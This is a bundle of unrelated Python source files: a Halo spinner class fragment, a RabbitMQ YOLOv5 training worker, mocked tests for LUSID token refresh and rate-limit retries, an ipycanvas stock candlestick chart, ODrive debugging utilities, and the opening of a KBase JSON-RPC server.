Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if self._spinner_id is not None:
return self
if not (self.enabled and self._check_stream()):
return self
self._hide_cursor()
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
        self._spinner_thread.daemon = True
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if self._spinner_thread and self._spinner_thread.is_alive():
self._stop_spinner.set()
self._spinner_thread.join()
if self.enabled:
self.clear()
self._frame_index = 0
self._spinner_id = None
self._show_cursor()
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=" ", text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self.enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text["original"]
text = text.strip()
if self._text_color:
text = colored_frame(text, self._text_color)
self.stop()
output = "{0} {1}\n".format(
*[(text, symbol) if self._placement == "right" else (symbol, text)][0]
)
try:
self._write(output)
except UnicodeEncodeError:
self._write(encode_utf_8_text(output))
return self
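# A minimal usage sketch (hypothetical text values):
#
#   with Halo(text="Loading", spinner="dots") as spinner:
#       do_work()                # spinner animates while this runs
#       spinner.succeed("Done")  # persists a success symbol and text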
|
rpc_server.py
|
#!/usr/bin/env python
import pika
import json
import threading
import functools
from config import LOG_PREFIX, CLASSIFICATION, RECOGNITION, \
MULTI_RECOGNITION, START_MODEL_TRAINING_QUEUE, HOST, MODELS_DIR, \
EX_MODEL, KEY_MODEL_TRAINING_SUCCEED, KEY_MODEL_TRAINING_FAILED, \
DATASETS_DIR
from core.train_yolov5 import train_yolov5
from pathlib import Path
conn_parameters = pika.ConnectionParameters(host=HOST,
connection_attempts=20,
retry_delay=5)
connection = pika.BlockingConnection(conn_parameters)
channel = connection.channel()
channel.queue_declare(queue=START_MODEL_TRAINING_QUEUE, durable=True)
channel.exchange_declare(exchange=EX_MODEL, exchange_type="topic", durable=True)
def raise_not_implemented(task):
    raise RuntimeError(f"{task} inference function is not implemented")
def ack_message(ch, delivery_tag):
"""Note that `channel` must be the same pika channel instance via which
the message being ACKed was retrieved (AMQP protocol constraint).
"""
if ch.is_open:
ch.basic_ack(delivery_tag)
else:
# Channel is already closed, so we can't ACK this message;
# log and/or do something that makes sense for your app in this case.
pass
def start_training(conn, ch, delivery_tag, body):
markup_result = json.loads(body.decode("utf-8"))
print(LOG_PREFIX, "Got markup result", markup_result)
markup_type = markup_result["type"]
markup_items = markup_result["items"]
markup_id = markup_result["markupId"]
model_id = markup_result["modelId"]
markup_items = [{ **item, "imageUrl": Path(DATASETS_DIR, item["imageUrl"]) } for item in markup_items]
    # Create the directory where the trained model's weights will be written
model_dir = Path(MODELS_DIR, model_id)
model_dir.mkdir(parents=True, exist_ok=True)
try:
if markup_type == MULTI_RECOGNITION:
train_yolov5(markup_items, model_dir)
elif markup_type == CLASSIFICATION:
raise RuntimeError(f"Training model for {markup_type} task is not implemented")
elif markup_type == RECOGNITION:
raise RuntimeError(f"Training model for {markup_type} task is not implemented")
else:
raise RuntimeError(f"Unknown markup type: {markup_type}")
except Exception as e:
print(e)
message_body = { "markupId": markup_id,
"modelId": model_id,
"type": markup_type }
routing_key = KEY_MODEL_TRAINING_FAILED
else:
message_body = { "markupId": markup_id,
"modelId": model_id,
"type": markup_type,
"weightsPath": str(Path(model_id, "weights.pt")) }
routing_key = KEY_MODEL_TRAINING_SUCCEED
publish_cb = functools.partial(ch.basic_publish,
exchange=EX_MODEL,
routing_key=routing_key,
body=json.dumps(message_body))
conn.add_callback_threadsafe(publish_cb)
ack_cb = functools.partial(ack_message, channel, delivery_tag)
conn.add_callback_threadsafe(ack_cb)
    # Broadcast the training-result message. Publishing directly from this
    # consumer thread (the commented-out calls below) is not thread-safe with
    # pika's BlockingConnection, hence the add_callback_threadsafe calls above.
# ch.basic_publish(exchange=EX_MODEL,
# routing_key=routing_key,
# body=json.dumps(message_body))
# ch.basic_ack(delivery_tag=delivery_tag)
def on_message(channel, method, header, body, args):
(connection, threads) = args
delivery_tag = method.delivery_tag
t = threading.Thread(target=start_training, args=(connection, channel, delivery_tag, body))
t.start()
threads.append(t)
channel.basic_qos(prefetch_count=1)
threads = []
on_message_callback = functools.partial(on_message, args=(connection, threads))
channel.basic_consume(queue=START_MODEL_TRAINING_QUEUE, on_message_callback=on_message_callback)
print(LOG_PREFIX, "Awaiting RPC requests")
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
# Wait for all to complete
for thread in threads:
thread.join()
connection.close()
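# A minimal client-side sketch (hypothetical payload values) for enqueueing a
# training request that this worker consumes:
#
#   request = {"type": MULTI_RECOGNITION,
#              "items": [{"imageUrl": "images/0001.jpg"}],
#              "markupId": "markup-1",
#              "modelId": "model-1"}
#   channel.basic_publish(exchange="",
#                         routing_key=START_MODEL_TRAINING_QUEUE,
#                         body=json.dumps(request))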
|
test_token_refresh.py
|
import os
import unittest
from time import sleep, time
from threading import Thread
from datetime import datetime, timedelta
from lusid.utilities import ApiConfigurationLoader
from lusid.utilities.proxy_config import ProxyConfig
from lusid.utilities import RefreshingToken
from parameterized import parameterized
from utilities import CredentialsSource
from unittest.mock import patch
from utilities.temp_file_manager import TempFileManager
from utilities import MockApiResponse
source_config_details, config_keys = CredentialsSource.fetch_credentials(), CredentialsSource.fetch_config_keys()
class TokenRefresh(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.config = ApiConfigurationLoader.load(CredentialsSource.secrets_path())
def test_get_token(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
self.assertIsNotNone(refreshed_token)
@staticmethod
def force_refresh(refresh_token):
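        # String-formatting de-references the token, forcing a refresh if it
        # has expired.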
return f"{refresh_token}"
@staticmethod
def convert_to_http_date(datetime_value):
return datetime_value.strftime('%a, %d %b %Y %H:%M:%S GMT')
def test_get_token_with_proxy(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
},
"proxy": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" in key
}
}
secrets["api"].pop("clientCertificate", None)
if secrets["proxy"].get("address", None) is None:
self.skipTest(f"missing proxy configuration")
TempFileManager.create_temp_file(secrets)
proxy_config = ProxyConfig(
address=secrets["proxy"]["address"],
username=secrets["proxy"]["username"],
password=secrets["proxy"]["password"]
)
proxies = proxy_config.format_proxy_schema()
with patch.dict('os.environ', {"HTTPS_PROXY": proxies["https"]}, clear=True):
proxy_url = os.getenv("HTTPS_PROXY", None)
if proxy_url is not None:
refreshed_token = RefreshingToken(api_configuration=self.config,
expiry_offset=3599)
self.assertIsNotNone(refreshed_token)
def test_get_token_with_proxy_from_config(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
},
"proxy": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" in key
}
}
secrets["api"].pop("clientCertificate", None)
if secrets["proxy"].get("address", None) is None:
self.skipTest(f"missing proxy configuration")
TempFileManager.create_temp_file(secrets)
refreshed_token = RefreshingToken(api_configuration=self.config,
expiry_offset=3599)
self.assertIsNotNone(refreshed_token)
def test_refreshed_token_when_expired(self):
refreshed_token = RefreshingToken(api_configuration=self.config,
                                          expiry_offset=3599)  # 3599s offset on a 3600s token leaves ~1s of validity
self.assertIsNotNone(refreshed_token)
# force de-referencing the token value
first_value = f"{refreshed_token}"
sleep(1)
self.assertNotEqual(first_value, refreshed_token)
def test_token_when_refresh_token_expired_still_refreshes(self):
refreshed_token = RefreshingToken(api_configuration=self.config, expiry_offset=3599)
self.assertIsNotNone(refreshed_token)
# force de-referencing the token value
first_value = f"{refreshed_token}"
sleep(1)
with patch("requests.post", side_effect=[
MockApiResponse(
json_data={
"error": "invalid_grant",
"error_description": "The refresh token is invalid or expired."
},
status_code=400
),
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
self.assertNotEqual(first_value, refreshed_token)
def test_token_when_not_expired_does_not_refresh(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
self.assertIsNotNone(refreshed_token)
# force de-referencing the token value
first_value = f"{refreshed_token}"
sleep(1)
self.assertEqual(first_value, refreshed_token)
def test_can_make_header(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
header = "Bearer " + refreshed_token
self.assertIsNotNone(header)
def test_use_refresh_token_multiple_threads(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
thread1 = Thread(target=self.force_refresh, args=[refreshed_token])
thread2 = Thread(target=self.force_refresh, args=[refreshed_token])
thread3 = Thread(target=self.force_refresh, args=[refreshed_token])
with patch("requests.post") as identity_mock:
identity_mock.side_effect = lambda *args, **kwargs: MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 3600
},
status_code=200
)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
# Ensure that we only got an access token once
self.assertEqual(1, identity_mock.call_count)
def test_retries_on_429_status_code_initial_access_token(self):
"""
Ensures that in the event of a 429 HTTP Status Code being returned when communicating with an identity
provider, the request is retried.
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post") as identity_mock:
identity_mock.side_effect = [
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]
# Ensure that we were able to get the token, if not retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
self.assertEqual(identity_mock.call_count, 2)
def test_retries_on_429_status_code_using_refresh_token(self):
"""
Ensures that in the event of a 429 HTTP Status Code being returned when communicating with an identity
provider, the request is retried.
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post") as identity_mock:
            identity_mock.side_effect = [
# Get initial access token
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 1 # Expires almost immediately
},
status_code=200
),
# Return a 429 on the second attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429
),
# Return a 200 on the third attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token_2",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]
# Ensure that we were able to get the first access token
self.assertEqual(f"{refreshing_token}", "mock_access_token")
sleep(1) # Wait for initial token to expire
            # Try to get the access token again, forcing a refresh; if we can get it then a retry was made
self.assertEqual(f"{refreshing_token}", "mock_access_token_2")
self.assertEqual(identity_mock.call_count, 3)
def test_does_not_retry_on_4xx_status_code_other_than_429(self):
"""
Ensures that we do not retry on other common 4xx status codes such as 400 - Bad Request
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post") as identity_mock:
identity_mock.side_effect = [
# Return a 400
MockApiResponse(
json_data={
"error": "invalid_grant",
"error_description": "The refresh token is invalid or expired."
},
status_code=400
),
]
# Ensure that a 400 is raised as an error and not retried
with self.assertRaises(ValueError) as bad_request_exception:
self.force_refresh(refreshing_token)
self.assertEqual(identity_mock.call_count, 1) # No retrying
self.assertIn("invalid_grant", str(bad_request_exception.exception))
def test_retries_on_429s_up_till_retry_limit(self):
"""
Ensures that the refreshing token only retries up until the retry limit to prevent
an infinite retry loop
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
refreshing_token.retry_limit = 2 # Override default to ensure test runs in reasonable amount of time
expected_requests = 1 + refreshing_token.retry_limit # Initial request plus expected number retries
with patch("requests.post") as identity_mock:
identity_mock.side_effect = [
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={}
)
] * expected_requests # Return a 429 every time up until expected number of attempts
            # Ensure that an error is raised once the retry limit is reached
with self.assertRaises(ValueError) as retry_limit_error:
self.force_refresh(refreshing_token)
self.assertIn("Max retry limit", str(retry_limit_error.exception))
# Ensure that we only tried as many times as expected
self.assertEqual(expected_requests, identity_mock.call_count)
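    # The expected delays below assume retry n waits backoff_base * 2 ** (n - 1)
    # seconds (2, 4, 8, ... for backoff_base = 2), so k retries wait
    # 2 ** (k + 1) - 2 seconds in total.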
@parameterized.expand([
["One Attempt", 1, 2],
["Two Attempts", 2, 2 + 4],
["Three Attempts", 3, 2 + 4 + 8],
["Four Attempts", 4, 2 + 4 + 8 + 16],
])
def test_retries_on_429s_uses_exponential_back_off_if_no_retry_after_header(self, _, number_attempts_till_success,
expected_delay):
"""
Ensures that if no "Retry-After" header is provided then a simple exponential back-off strategy is used. This
is confirmed by checking that the time taken to successfully retrieve a token scales exponentially as the number
of retries increases.
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
refreshing_token.backoff_base = 2 # Use a 2 second base for calculating back-off
with patch("requests.post", side_effect=[
# Return a 429 on the first attempts
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
)] * number_attempts_till_success +
# Return a 200 on the last attempt
[
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
)
]
):
start = time()
            # Ensure that we were able to get the token; without retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
# Ensure that the elapsed time is as expected
self.assertEqual(int(elapsed), expected_delay)
@parameterized.expand([
["Zero", 0],
["Positive Int", 5],
["Positive Int2", 8]
# Not possible to have a negative integer returned in this header
])
def test_retries_on_429s_uses_retry_after_header_with_seconds_delay_if_exists(self, _, seconds_delay):
"""
Ensures that if a seconds delay is contained in the "Retry-After" header then a retry is attempted after
the appropriate amount of time.
        :param _: The name of the test
:param seconds_delay: The number of seconds to wait before retrying
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"Retry-After": str(seconds_delay)}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
            # Ensure that we were able to get the token; without retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
# Ensure that the wait was for an appropriate amount of time
self.assertEqual(int(elapsed), seconds_delay)
def test_retries_on_429s_uses_retry_after_header_with_http_date_in_future_if_exists(self):
"""
Ensures that if the HTTP Date returned on the "Retry-After" header is x seconds in the future
it takes approximately x seconds to retry and get the token.
"""
time_to_wait = 5
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"Retry-After": self.convert_to_http_date(datetime.utcnow() + timedelta(seconds=time_to_wait))}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
            # Ensure that we were able to get the token; without retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
            # Ensure that the wait was for an appropriate amount of time; because the seconds to wait are calculated
            # here instead of being provided directly, the delay could be a second less
self.assertGreaterEqual(int(elapsed), time_to_wait - 1)
self.assertLessEqual(int(elapsed), time_to_wait)
def test_retries_on_429s_uses_retry_after_header_with_http_date_in_past_if_exists(self):
"""
        Ensures that if the HTTP Date returned on the "Retry-After" header is x seconds in the past
        a retry attempt to get the token is made immediately.
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"Retry-After": self.convert_to_http_date(datetime.utcnow() - timedelta(seconds=5))}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
            # Ensure that we were able to get the token; without retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
            # Ensure that there was essentially no wait before retrying
self.assertLess(elapsed, 1)
def test_can_use_id_provider_handler_to_provide_retry_after_header_from_custom_header(self):
"""
Ensures that the "Retry-After" header can be used after being created from a custom header using the
id_provider_response_handler.
"""
time_to_wait = 5
def header_creator(id_provider_response):
rate_limit_reset = id_provider_response.headers.get("X-Rate-Limit-Reset", None)
if rate_limit_reset is not None:
id_provider_response.headers["Retry-After"] = max(int(rate_limit_reset - datetime.utcnow().timestamp()), 0)
refreshing_token = RefreshingToken(api_configuration=self.config, id_provider_response_handler=header_creator)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"X-Rate-Limit-Reset": datetime.utcnow().timestamp() + time_to_wait}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
            # Ensure that we were able to get the token; without retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
            # Ensure that the wait was for an appropriate amount of time; because the seconds to wait are calculated
            # here instead of being provided directly, the delay could be a second less
            self.assertGreaterEqual(int(elapsed), time_to_wait - 1)
            self.assertLessEqual(int(elapsed), time_to_wait)
@unittest.skip("Not valid test when using Okta caching proxy")
def test_retries_against_id_provider_after_hitting_rate_limit(self):
"""
Integration tests which calls the identity provider specified in the provided credentials (Okta in the
CI pipeline) and asserts that when the rate limit is hit a retry is made and the access token can be
successfully retrieved without throwing.
"""
responses = []
def record_response(id_provider_response):
nonlocal responses
responses.append(id_provider_response.status_code)
# Create 5 independent tokens
refreshing_token1 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token2 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token3 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token4 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token5 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
# Get the access token from each one on an independent thread
thread1 = Thread(target=self.force_refresh, args=[refreshing_token1])
thread2 = Thread(target=self.force_refresh, args=[refreshing_token2])
thread3 = Thread(target=self.force_refresh, args=[refreshing_token3])
thread4 = Thread(target=self.force_refresh, args=[refreshing_token4])
thread5 = Thread(target=self.force_refresh, args=[refreshing_token5])
# Run all threads
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
thread1.join()
thread2.join()
thread3.join()
thread4.join()
thread5.join()
# Count the status codes returned
result = dict((i, responses.count(i)) for i in responses)
# Expect to see at least a single 429
self.assertGreaterEqual(result[429], 1)
# And 5 200s eventually
self.assertEqual(result[200], 5)
|
stock_chart_canvas.py
|
from typing import Iterable, Tuple
from datetime import datetime, timedelta
from enum import IntEnum
from threading import Event, Thread
from ipycanvas import Canvas
from ipycanvas.canvas import hold_canvas
def draw_ticker(ticker, canvas):
pass
class TimeFrame(IntEnum):
    # Frame durations in milliseconds.
    MINUTES_5 = 5 * 60 * 1000
HOURS = 60 * 60 * 1000
DAYS = 24 * HOURS
MONTHS = 30 * DAYS
def choose_time_frame(delta_time_ms: float) -> TimeFrame:
    # Pick the largest frame that still fits more than 10 candles into the span.
    time_frames = [TimeFrame.MINUTES_5, TimeFrame.HOURS, TimeFrame.DAYS, TimeFrame.MONTHS]
    time_frames_gt_10 = [tf for tf in time_frames if delta_time_ms / tf > 10]
    return max(time_frames_gt_10)
def consolidate(stocks: Iterable[Tuple[datetime, float, float, float, float]]) -> Tuple[datetime, float, float, float, float]:
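    """Consolidate a sequence of OHLC rows into a single row: the first
    timestamp and open, the maximum high, the minimum low, and the last close.
    """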
first_date = None
first_open = None
last_close = None
min_low = None
max_high = None
for (timestamp, open, high, low, close) in stocks:
        if first_date is None:
            first_date = timestamp
        if first_open is None:
            first_open = open
        last_close = close
        if min_low is None or min_low > low:
            min_low = low
        if max_high is None or max_high < high:
            max_high = high
return (first_date, first_open, max_high, min_low, last_close)
def draw_stocks(data: Iterable[Tuple[datetime, float, float, float, float]], canvas: Canvas, min_x: datetime, min_y: float, max_y: float):
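    """Draw candlesticks onto the canvas, mapping timestamps to x pixels
    (relative to min_x) and prices to y pixels (relative to min_y..max_y,
    with y inverted so that higher prices are drawn higher up)."""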
CANDLE_STICK_WIDTH_PX = 20
max_x = min_x + timedelta(minutes=5) * (canvas.width / CANDLE_STICK_WIDTH_PX)
for (timestamp, open, high, low, close) in data:
if min_x > timestamp or timestamp > max_x:
continue
        time_range_s = max_x.timestamp() - min_x.timestamp()
        time_off_of_cur = timestamp.timestamp() - min_x.timestamp()
        x1 = (time_off_of_cur / time_range_s) * canvas.width
        # TODO: Update this later
        # \/ Assumes it is a 5min chart
        x2 = ((time_off_of_cur + 5 * 60) / time_range_s) * canvas.width
width = x2 - x1
y_low = canvas.height - ((low - min_y) / (max_y - min_y)) * canvas.height
y_high = canvas.height - ((high - min_y) / (max_y - min_y)) * canvas.height
y_open = canvas.height - ((open - min_y) / (max_y - min_y)) * canvas.height
y_close = canvas.height - ((close - min_y) / (max_y - min_y)) * canvas.height
        canvas.fill_style = 'green'
canvas.stroke_style = 'green'
height = abs(y_close - y_open)
top = y_close
if open > close:
canvas.fill_style = 'red'
canvas.stroke_style = 'red'
canvas.stroke_line((x1 + x2) / 2, y_high, (x1 + x2) / 2, y_low)
canvas.fill_rect(x1 + width / 10, top, width - (width / 5), height)
class StockChartCanvas:
def __init__(self, canvas: Canvas, data):
self.data = data
self.canvas = canvas
self.mouse_down = False
self.x_offset = data[0][0]
self.y_offset = 0
self.prev_pos = (0, 0)
        self.canvas.on_client_ready(self.redraw)
self.canvas.on_mouse_down(lambda x, y: self._mouse_down(x, y))
self.canvas.on_mouse_up(lambda x, y: self._mouse_up(x, y))
self.canvas.on_mouse_move(lambda x, y: self._mouse_move(x, y))
self.canvas.on_mouse_out(lambda x, y: self._mouse_out(x, y))
self.stopped = Event()
        self.event_loop = Thread(target=self._update)
def start(self):
self.event_loop.start()
def stop(self):
self.stopped.set()
self.event_loop.join()
def _update(self):
while not self.stopped.wait(1/60):
self.redraw()
def redraw(self):
with hold_canvas(self.canvas):
self.canvas.clear()
draw_stocks(self.data, self.canvas, self.x_offset, self.y_offset + 135, self.y_offset + 140)
def _mouse_down(self, x, y):
self.mouse_down = True
def _mouse_up(self, x, y):
self.mouse_down = False
def _mouse_out(self, x, y):
self.mouse_down = False
def _mouse_move(self, x, y):
if self.mouse_down:
self.x_offset = self.x_offset + timedelta(minutes=(x - self.prev_pos[0]))
self.y_offset = self.y_offset + (y - self.prev_pos[1]) / 100
self.prev_pos = (x, y)
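# Example usage (a minimal sketch; the Canvas size and the OHLC rows in
# `data` are assumptions):
# canvas = Canvas(width=800, height=400)
# chart = StockChartCanvas(canvas, data)
# chart.start()  # redraws at ~60 fps until chart.stop() is called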
|
utils.py
|
from __future__ import print_function
import sys
import time
import threading
import platform
import subprocess
import os
from fibre.utils import Event
from odrive.enums import errors
try:
if platform.system() == 'Windows':
import win32console
import colorama
colorama.init()
except ImportError:
print("Could not init terminal features.")
print("Refer to install instructions at http://docs.odriverobotics.com/#downloading-and-installing-tools")
sys.stdout.flush()
_VT100Colors = {
'green': '\x1b[92;1m',
'cyan': '\x1b[96;1m',
'yellow': '\x1b[93;1m',
'red': '\x1b[91;1m',
'default': '\x1b[0m'
}
class OperationAbortedException(Exception):
pass
def dump_errors(odrv, clear=False):
axes = [(name, axis) for name, axis in odrv._remote_attributes.items() if 'axis' in name]
axes.sort()
for name, axis in axes:
print(name)
# Flatten axis and submodules
# (name, remote_obj, errorcode)
module_decode_map = [
('axis', axis, errors.axis),
('motor', axis.motor, errors.motor),
('encoder', axis.encoder, errors.encoder),
('controller', axis.controller, errors.controller),
]
# Module error decode
for name, remote_obj, errorcodes in module_decode_map:
prefix = ' '*2 + name + ": "
if (remote_obj.error != errorcodes.ERROR_NONE):
print(prefix + _VT100Colors['red'] + "Error(s):" + _VT100Colors['default'])
errorcodes_tup = [(name, val) for name, val in errorcodes.__dict__.items() if 'ERROR_' in name]
for codename, codeval in errorcodes_tup:
if remote_obj.error & codeval != 0:
print(" " + codename)
if clear:
remote_obj.error = errorcodes.ERROR_NONE
else:
print(prefix + _VT100Colors['green'] + "no error" + _VT100Colors['default'])
data_rate = 100
plot_rate = 10
num_samples = 1000
def start_liveplotter(get_var_callback):
"""
Starts a liveplotter.
The variable that is plotted is retrieved from get_var_callback.
This function returns immediately and the liveplotter quits when
the user closes it.
"""
import matplotlib.pyplot as plt
cancellation_token = Event()
global vals
vals = []
def fetch_data():
global vals
while not cancellation_token.is_set():
try:
data = get_var_callback()
except Exception as ex:
print(str(ex))
time.sleep(1)
continue
vals.append(data)
if len(vals) > num_samples:
vals = vals[-num_samples:]
time.sleep(1/data_rate)
# TODO: use animation for better UI performance, see:
# https://matplotlib.org/examples/animation/simple_anim.html
def plot_data():
global vals
plt.ion()
# Make sure the script terminates when the user closes the plotter
def did_close(evt):
cancellation_token.set()
fig = plt.figure()
fig.canvas.mpl_connect('close_event', did_close)
while not cancellation_token.is_set():
plt.clf()
plt.plot(vals)
plt.legend(list(range(len(vals))))
fig.canvas.draw()
fig.canvas.start_event_loop(1/plot_rate)
fetch_t = threading.Thread(target=fetch_data)
fetch_t.daemon = True
fetch_t.start()
plot_t = threading.Thread(target=plot_data)
plot_t.daemon = True
plot_t.start()
    return cancellation_token
#plot_data()
def print_drv_regs(name, motor):
"""
    Dumps the current gate driver registers for the specified motor
"""
fault = motor.gate_driver.drv_fault
status_reg_1 = motor.gate_driver.status_reg_1
status_reg_2 = motor.gate_driver.status_reg_2
ctrl_reg_1 = motor.gate_driver.ctrl_reg_1
ctrl_reg_2 = motor.gate_driver.ctrl_reg_2
print(name + ": " + str(fault))
print("DRV Fault Code: " + str(fault))
print("Status Reg 1: " + str(status_reg_1) + " (" + format(status_reg_1, '#010b') + ")")
print("Status Reg 2: " + str(status_reg_2) + " (" + format(status_reg_2, '#010b') + ")")
print("Control Reg 1: " + str(ctrl_reg_1) + " (" + format(ctrl_reg_1, '#013b') + ")")
print("Control Reg 2: " + str(ctrl_reg_2) + " (" + format(ctrl_reg_2, '#09b') + ")")
def show_oscilloscope(odrv):
size = 18000
values = []
for i in range(size):
values.append(odrv.get_oscilloscope_val(i))
import matplotlib.pyplot as plt
plt.plot(values)
plt.show()
def rate_test(device):
"""
Tests how many integers per second can be transmitted
"""
# import matplotlib.pyplot as plt
# plt.ion()
print("reading 10000 values...")
numFrames = 10000
vals = []
for _ in range(numFrames):
vals.append(device.axis0.loop_counter)
loopsPerFrame = (vals[-1] - vals[0])/numFrames
loopsPerSec = (168000000/(2*10192))
FramePerSec = loopsPerSec/loopsPerFrame
print("Frames per second: " + str(FramePerSec))
# plt.plot(vals)
# plt.show(block=True)
def usb_burn_in_test(get_var_callback, cancellation_token):
"""
    Starts a background thread that reads values from the USB device in a spin-loop
"""
def fetch_data():
global vals
i = 0
while not cancellation_token.is_set():
try:
get_var_callback()
i += 1
except Exception as ex:
print(str(ex))
time.sleep(1)
i = 0
continue
if i % 1000 == 0:
print("read {} values".format(i))
threading.Thread(target=fetch_data, daemon=True).start()
def yes_no_prompt(question, default=None):
if default is None:
question += " [y/n] "
elif default == True:
question += " [Y/n] "
elif default == False:
question += " [y/N] "
while True:
print(question, end='')
choice = input().lower()
if choice in {'yes', 'y'}:
return True
elif choice in {'no', 'n'}:
return False
elif choice == '' and default is not None:
return default
|
MiscIndexerServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
import log
from MiscIndexer.authclient import KBaseAuth as _KBaseAuth
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
